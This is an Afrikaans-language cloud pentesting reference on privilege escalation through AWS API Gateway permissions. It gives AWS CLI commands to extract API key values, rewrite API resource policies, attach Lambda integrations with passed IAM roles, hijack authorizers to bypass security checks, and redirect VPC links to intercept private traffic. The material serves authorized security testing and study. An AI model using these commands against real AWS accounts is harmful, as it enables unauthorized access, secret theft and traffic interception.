AWS - Apigateway Privesc

Apigateway

Vir meer inligting, kyk:

apigateway:POST

Met hierdie toestemming kan jy API sleutels van die geconfigureerde API's genereer (per streek).

aws --region <region> apigateway create-api-key

Potensiële Impak: Jy kan nie privesc met hierdie tegniek nie, maar jy mag toegang tot sensitiewe inligting kry.

apigateway:GET

Met hierdie toestemming kan jy gegenereerde API-sleutels van die geconfigureerde API's verkry (per streek).

aws --region <region> apigateway get-api-keys
aws --region <region> apigateway get-api-key --api-key <key> --include-value

Potensiële Impak: Jy kan nie privesc met hierdie tegniek nie, maar jy mag toegang tot sensitiewe inligting kry.

apigateway:UpdateRestApiPolicy, apigateway:PATCH

Met hierdie toestemmings is dit moontlik om die hulpbronbeleid van 'n API te wysig om jouself toegang te gee om dit aan te roep en die potensiële toegang wat die API-gateway mag hê, te misbruik (soos om 'n kwesbare lambda aan te roep).

aws apigateway update-rest-api \
--rest-api-id api-id \
--patch-operations op=replace,path=/policy,value='"{\"jsonEscapedPolicyDocument\"}"'

Potensiële Impak: Jy sal gewoonlik nie direk met hierdie tegniek kan privesc nie, maar jy mag toegang tot sensitiewe inligting kry.

apigateway:PutIntegration, apigateway:CreateDeployment, iam:PassRole

'n Aanvaller met die toestemmings apigateway:PutIntegration, apigateway:CreateDeployment, en iam:PassRole kan 'n nuwe integrasie by 'n bestaande API Gateway REST API met 'n Lambda-funksie wat 'n IAM-rol aangeheg het, voeg. Die aanvaller kan dan die Lambda-funksie aktiveer om arbitrêre kode uit te voer en moontlik toegang tot die hulpbronne wat met die IAM-rol geassosieer is, te verkry.

API_ID="your-api-id"
RESOURCE_ID="your-resource-id"
HTTP_METHOD="GET"
LAMBDA_FUNCTION_ARN="arn:aws:lambda:region:account-id:function:function-name"
LAMBDA_ROLE_ARN="arn:aws:iam::account-id:role/lambda-role"

# Add a new integration to the API Gateway REST API
aws apigateway put-integration --rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --type AWS_PROXY --integration-http-method POST --uri arn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations --credentials $LAMBDA_ROLE_ARN

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Potensiële Impak: Toegang tot hulpbronne geassosieer met die Lambda-funksie se IAM-rol.

apigateway:UpdateAuthorizer, apigateway:CreateDeployment

'n Aanvaller met die toestemmings apigateway:UpdateAuthorizer en apigateway:CreateDeployment kan 'n bestaande API Gateway-outeur wysig om sekuriteitskontroles te omseil of om arbitrêre kode uit te voer wanneer API-versoeke gemaak word.

API_ID="your-api-id"
AUTHORIZER_ID="your-authorizer-id"
LAMBDA_FUNCTION_ARN="arn:aws:lambda:region:account-id:function:function-name"

# Update the API Gateway authorizer
aws apigateway update-authorizer --rest-api-id $API_ID --authorizer-id $AUTHORIZER_ID --authorizer-uri arn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Potensiële Impak: Omseiling van sekuriteitskontroles, ongeoorloofde toegang tot API-hulpbronne.

apigateway:UpdateVpcLink

'n Aanvaller met die toestemming apigateway:UpdateVpcLink kan 'n bestaande VPC-koppeling wysig om na 'n ander Netwerk Laai Balancer te verwys, wat moontlik private API-verkeer na ongeoorloofde of kwaadwillige hulpbronne kan herlei.

bashCopy codeVPC_LINK_ID="your-vpc-link-id"
NEW_NLB_ARN="arn:aws:elasticloadbalancing:region:account-id:loadbalancer/net/new-load-balancer-name/50dc6c495c0c9188"

# Update the VPC Link
aws apigateway update-vpc-link --vpc-link-id $VPC_LINK_ID --patch-operations op=replace,path=/targetArns,value="[$NEW_NLB_ARN]"

Potensiële Impak: Onbevoegde toegang tot private API-hulpbronne, onderskepping of onderbreking van API-verkeer.